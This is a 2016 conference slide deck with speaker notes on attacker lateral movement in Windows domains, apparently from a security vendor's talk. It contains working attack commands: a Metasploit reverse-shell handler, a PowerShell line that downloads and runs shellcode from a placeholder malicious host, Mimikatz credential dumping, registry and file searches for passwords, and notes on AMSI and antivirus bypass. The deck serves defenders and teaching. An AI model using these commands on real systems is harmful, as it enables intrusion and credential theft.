Recomendados
Recomendados
Más contenido relacionado
La actualidad más candente
La actualidad más candente (19)
Destacado
Destacado (20)
Similar a Lateral Movement - Phreaknik 2016
Similar a Lateral Movement - Phreaknik 2016 (20)
Lateral Movement - Phreaknik 2016
- 1. LATERAL MOVEMENT How attackers quietly transverse your Networks Xavier Ashe VP, Drawbridge Networks @xavierashe
- 2. ABOUT XAVIER • Currently VP of Drawbridge Networks • Hacking since the late 80s • First half my career was implementing Security • Second half career is security consulting, VARs, and Vendors • Georgia Institute Of Technology: Computer Engineering with International Affairs minor • Twitter: @xavierashe
- 3. KILL CHAIN IS OUTDATED Reco n Weaponiz e Deliver y Exploi t Insta ll C&C Actio n
- 4. KILL CHAIN, UPDATED Recon Weaponize Deliver y Exploi t Persisten ce Action Lateral Movemen t
- 5. WHAT IS LATERAL MOVEMENT? Marketing PCSales PC Executive PCIT Laptop Domain Controller Web Server
- 6. THREETYPES OF RECON • Passive Information Gathering • Semi-passive Information Gathering • Active Information Gathering
- 7. YOU’VE GOT REMOTE SHELL, NOW WHAT? • systeminfo | findstr /B /C:"OS Name" /C:"OS Version" • hostname • echo %username% • net users • net user <username> • echo %userdomain% • echo %userdnsdomain% • nslookup -querytype=SRV _LDAP._TCP.DC._MSDCS.<domain> • net start • ipconfig /all • route print • arp -A • netstat -ano • netsh firewall show state • netsh firewall show config • schtasks /query /fo LIST /v • tasklist /SVC • DRIVERQUERY
- 9. SERVICE PRINCIPAL NAMES (SPNS) • Find SPNs linked to a certain computer setspn -L <ServerName> • Find SPNs linked to a certain user account setspn -L <domainuser> • Powershell Get-NetUser -SPN
- 10. PRIVILEGE ESCALATION • Look for missing patches, known exploits • Look in automated install answer files for passwords • Get saved passwords from Group Policy (metasploit or Get- GPPPaassword) • Look for registry setting "AlwaysInstallElevated“ • HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated • HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated • Hail Mary • dir /s *pass* == *cred* == *vnc* == *.config* • findstr /si password *.xml *.ini *.txt • reg query HKLM /f password /t REG_SZ /s • reg query HKCU /f password /t REG_SZ /s
- 11. PRIVILEGE ESCALATION - ADVANCED • Vulnerable Windows Services • DLL hijacking using vulnerable folders in the PATH • Replace executable with existing scheduled task.
- 12. PRIVILEGE ESCALATION – HACKING A SERVICE
- 13. OR JUST RUN POWERUP (INVOKE-ALLCHECKS) • If you are an admin in a medium integrity process (exploitable with bypassuac) • for any unquoted service path issues • for any services with misconfigured ACLs (exploitable with service_*) • any improper permissions on service executables (exploitable with service_exe_*) • for any leftover unattend.xml files • if the AlwaysInstallElevated registry key is set • if any Autologon credentials are left in the registry • for any encrypted web.config strings and application pool passwords • for any %PATH% .DLL hijacking opportunities (exploitable with write_dllhijacker)
- 14. POWERSHELL There are a number of reasons why attackers love PowerShell: • Run code in memory without touching disk • Download & execute code from another system • Direct access to .NET & Win32 API • Built-in remoting • CMD.exe is commonly blocked, though not PowerShell • Most organizations are not watching PowerShell activity • Many endpoint security products don’t have visibility into PowerShell activity
- 15. POWERSHELLV5 SECURITY ENHANCEMENTS • Script block logging • System-wide transcripts • Constrained PowerShell enforced with AppLocker • The Anti-Malware Scan Interface (AMSI) • There are two primary methods of bypassing AMSI (at least for now): • Provide & use a custom amsi.dll and call that one from custom EXE. • Matt Graeber described how to use reflection to bypass AMSI
- 16. REMOTE ACCESS WITH NO HITTO DISK Create Shellcode from Metasploit msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https msf exploit(handler) > set LHOST <Your local host> msf exploit(handler) > set LPORT 443 msf exploit(handler) > exploit Powershell Shellcode Injection IEX (New-Object Net.WebClient).DownloadString("https: //<Malicious URL>/Invoke- Shellcode.ps1") Invoke-ShellCode -Payload windows/meterpreter/reverse_https - Lhost <malicious IP> -Lport 443 - Force
- 17. POWERSPLOIT • Invoke-DllInjection.ps1 • Invoke-Shellcode.ps1 • Invoke-WmiCommand.ps1 • Get-GPPPassword.ps1 • Get-Keystrokes.ps1 • Get-TimedScreenshot.ps1 • Get-VaultCredential.ps1 • Invoke-CredentialInjection.ps1 • Invoke-Mimikatz.ps1 • Invoke-NinjaCopy.ps1 • Invoke-TokenManipulation.ps1 • Out-Minidump.ps1 • VolumeShadowCopyTools.ps1 • Invoke- ReflectivePEInjection.ps1
- 18. INVOKE-MIMIKATZ
- 19. NO DOMAIN ADMINSYET? Invoke-Mimikatz –dumpcreds Out-File -Append c:evilplace$env:computername.txt
- 20. OTHER WAYSTO GET DOMAIN ADMIN • Passwords in SYSVOL & Group Policy Preferences • Exploit the MS14-068 Kerberos Vulnerability on a Domain Controller Missing the Patch • Kerberos TGS Service Ticket Offline Cracking (Kerberoast) • Gain Access to the Active Directory Database File (ntds.dit) • Compromise an account with rights to logon to a Domain Controller • Then run Mimicatz
- 21. POWERSHELL EMPIRE Capabilities: • PowerShell based Remote Access Trojan (RAT). • Python server component (Kali Linux). • AES Encrypted C2 channel. • Dumps and tracks credentials in database.
- 22. NISHANG • Check-VM • Remove-Update • Invoke-CredentialsPhish
- 23. PS>ATTACK Use for AV Bypass. Build tool for new encrypted exe every time. Contains • PowerTools • PowerUp • PowerView • Nishang • Powercat • Inveigh Powersploit: • Invoke-Mimikatz • Get-GPPPassword • Invoke-NinjaCopy • Invoke-Shellcode • Invoke-WMICommand • VolumeShadowCopyTools
- 24. REDSNARF New tool just released by NCC Group • Retrieval of local SAM hashes • Enumeration of user(s) running with elevated system privileges and their corresponding lsa secrets password • Retrieval of MS cached credentials • Pass-the-hash • Quickly identify weak and guessable username/password combinations (default of administrator/Password01) • The ability to retrieve hashes across a range • Hash spraying: • Credsfile will accept a mix of pwdump, fgdump and plaintext username and password separated by a space • Lsass dump for offline analysis with Mimikatz • Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing • Dumping of Domain controller hashes using the drsuapi method • Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator' • Ability to decrypt cpassword hashes • Ability to start a shell on a remote machine • The ability to clear the event logs (application, security, setup or system) • Results and logs are saved on a per-host basis for analysis
- 25. REFERENCES • SPNs: http://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn- syntax-setspn-exe.aspx • SPN Query: https://technet.microsoft.com/en-us/library/ee176972.aspx • Active Directory Security: https://adsecurity.org • Remote Access PowerShell with Metasploit http://www.redblue.team/2016/01/powershell-traceless-threat- and-how-to.html • No Domain Admin yet? https://365lab.net/tag/invoke-mimikatz/ • Privilege Escalation: http://www.fuzzysecurity.com/tutorials/16.html • PowerUp: http://www.powershellempire.com/?page_id=378 • PowerSploit: https://github.com/PowerShellMafia/PowerSploit • Mimikatz: https://github.com/gentilkiwi/mimikatz • PowerShell Empire: https://github.com/powershellempire/empire • Nishang: https://github.com/samratashok/nishang • PS>Attack: https://github.com/jaredhaight/psattack • RedSnarf: https://www.nccgroup.trust/uk/about-us/newsroom-and- events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/ Contact me! @XavierAshe
Notas del editor
- Reconnaissance – Learning about the target using many techniques. Weaponization – Combining your vector of attack with a malicious payload. Delivery – Actually transmitting the payload via some communications vector. Exploitation – Taking advantage of some software or human weakness to get your payload to run. Installation – The payload establishes persistence of an individual host. Command & Control (C2) – The malware calls home, providing attacker control. Actions on Objectives – The bad actor steals or does whatever he was planning on doing.
- Passive Information Gathering: Passive Information Gathering is generally only useful if there is a very clear requirement that the information gathering activities never be detected by the target. This type of profiling is technically difficult to perform as we are never sending any traffic to the target organization neither from one of our hosts or “anonymous” hosts or services across the Internet. This means we can only use and gather archived or stored information. As such this information can be out of date or incorrect as we are limited to results gathered from a third party. Semi-passive Information Gathering: The goal for semi-passive information gathering is to profile the target with methods that would appear like normal Internet traffic and behavior. We query only the published name servers for information, we aren’t performing in-depth reverse lookups or brute force DNS requests, we aren’t searching for “unpublished” servers or directories. We aren’t running network level portscans or crawlers and we are only looking at metadata in published documents and files; not actively seeking hidden content. The key here is not to draw attention to our activities. Post mortem the target may be able to go back and discover the reconnaissance activities but they shouldn’t be able to attribute the activity back to anyone. Active Information Gathering: Active information gathering should be detected by the target and suspicious or malicious behavior. During this stage we are actively mapping network infrastructure (think full port scans nmap –p1-65535), actively enumerating and/or vulnerability scanning the open services, we are actively searching for unpublished directories, files, and servers. Most of this activity falls into your typically “reconnaissance” or “scanning” activities for your standard pentest.
- Note that the value in %USERDOMAIN% may not be the same as the one returned by systeminfo command. %USERDOMAIN% gives the domain name the user account belongs to, it could be different from the domain of the computer. Also, this may give you the NetBios name of the computer, not DNS/FQDN name.
- When the box you compromise is connected to a domain it is well worth looking for the Groups.xml file which is stored in SYSVOL. Any authenticated user will have read access to this file. The password in the xml file is "obscured" from the casual user by encrypting it with AES, I say obscured because the static key is published on the msdn website allowing for easy decryption of the stored value. The next thing we will look for is a strange registry setting "AlwaysInstallElevated", if this setting is enabled it allows users of any privilege level to install *.msi files as NT AUTHORITY\SYSTEM. It seems like a strange idea to me that you would create low privilege users (to restrict their use of the OS) but give them the ability to install programs as SYSTEM.
- Metasplot can be used to
- Script block logging – logs the PowerShell code actually executed by PowerShell. Without this enabled, obfuscated code is logged, making it far more difficult to create useful indicators. System-wide transcripts – When enabled, a transcript file can be written to a write-only share for each PowerShell user per computer. If the share is offline, the computer will cache the file data until it’s back online. Constrained PowerShell enforced with AppLocker – When PowerShell v5 installed and AppLocker in Allow mode, PowerShell operates in constrained language mode which is a limited language mode preventing and Windows API access. For more on this, keep reading. The Anti-Malware Scan Interface (AMSI) in Windows 10 enables all script code to be scanned prior to execution by PowerShell and other Windows scripting engines. The Anti-Virus/Anti-Malware solution on the system must support AMSI for it to scan the code. The great benefit is that all code delivered to the PowerShell engine is scanned, even code injected into memory that was downloaded from the internet. As of mid-2016, only Microsoft Defender and AVG support AMSI.
- Invoke-CredentialInjection.ps1 - This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.
- His first blog on this subject is cleverly titled "Pass the pass(word)". In this blog, he discusses the fact that Windows Vista and higher feature a Security Support Provider (SSP) for Terminal Services named TsPkg, which provides single sign-on functionality to terminal servers. This feature can also be added to Windows XP SP3, as discussed here. Furthermore, this TechNet article discusses how to enable this SSO feature for specified terminal servers via GPO. However, as the author of the tool stated in his blog, and as my testing confirms, Windows will store the password in memory whether this feature is "enabled" via GPO or not. In other words, by default it's always on. A few weeks later, the author posted an update titled "Re-pass the pass(word)", where he discusses another SSP providing similar SSO capability, named WDigest. This time it's not only in Vista and higher, but in XP and Server 2003 also! WDigest provides for "digest access authentication", an extension to HTTP specified by RFC 2069 and later in RFC 2617. Direct access authentication improves upon basic access authentication, which sends credentials in the clear. Wdigest specifically supports RFC 2617, as well as RFC 2831, which is a more generic authentication mechanism (useful beyond HTTP) called Simple Authentication and Security Layer (SASL). The general idea here is that these specifications provide challenge-response authentication, whereby a challenge is issued and the responding party answers the challenge using a hashing routine that takes the clear-text password as an input. On there other hand, there will obviously be one or more trusted machines for which you will need to perform an interactive logon. For those machines, I suggest you remove the TsPkg and WDigest SSPs to avoid a blatent security risk. Update: Removing SSPs is no longer valid advice since Kerberos also stores the password. Therefore, the most effective protection is to avoid interactive logons to any untrusted hosts. Other solutions such as one-time-passwords should also be considered.
- This method is the simplest since no special “hacking” tool is required. All the attacker has to do is open up Windows explorer and search the domain SYSVOL DFS share for XML files. Most of the time, the following XML files will contain credentials: groups.xml, scheduledtasks.xml, & Services.xml. Put simply, exploiting MS14-068 takes less than 5 minutes and enables an attacker to effectively re-write a valid Kerberos TGT authentication ticket to make them a Domain Admin (and Enterprise Admin). As shown in the above graphic, this is like taking a valid boarding password and before boarding, writing “pilot” on it. Then while boarding the plane, you are escorted to the cockpit and asked if you would like coffee before taking off. This attack involves requesting a Kerberos service ticket(s) (TGS) for the Service Principal Name (SPN) of the target service account. This request uses a valid domain user’s authentication ticket (TGT) to request one or several service tickets for a target service running on a server. The Domain Controller doesn’t track if the user ever actually connects to these resources (or even if the user has access). The Domain Controller looks up the SPN in Active Directory and encrypts the ticket using the service account associated with the SPN in order for the service to validate user access. The encryption type of the requested Kerberos service ticket is RC4_HMAC_MD5 which means the service account’s NTLM password hash is used to encrypt the service ticket. This means that Kerberoast can attempt to open the Kerberos ticket by trying different NTLM hashes and when the ticket is successfully opened, the correct service account password is discovered. Note: No elevated rights are required to get the service tickets and no traffic is sent to the target.
- PS>Attack is a self contained custom PowerShell console which includes many offensive PowerShell tools which calls PowerShell (System.Management.Automation.dll) through .Net. The PowerShell attack tools are encrypted (AV evasion) and decrypted to memory at run-time. There’s also a custom build tool for ensuring every built exe is different (AV bypass). While PS>Attack is simply one method that an attacker can leverage PowerShell offensive tools without running PS>Attack PowerShell code runs in the earlier version of the PowerShell engine, if available. This means that if a system has PowerShell v2 (Windows 7 & Windows Server 2008 R2), then any PowerShell code executed is not logged. Event if PowerShell v5 is installed with system-wide transcript or script block logging. Windows 10 provides the ability to remove PowerShell v2.0 (no, this doesn’t remove PowerShell). Once PowerShell v2 is removed from Windows 10, PS>Attack usage is clearly logged.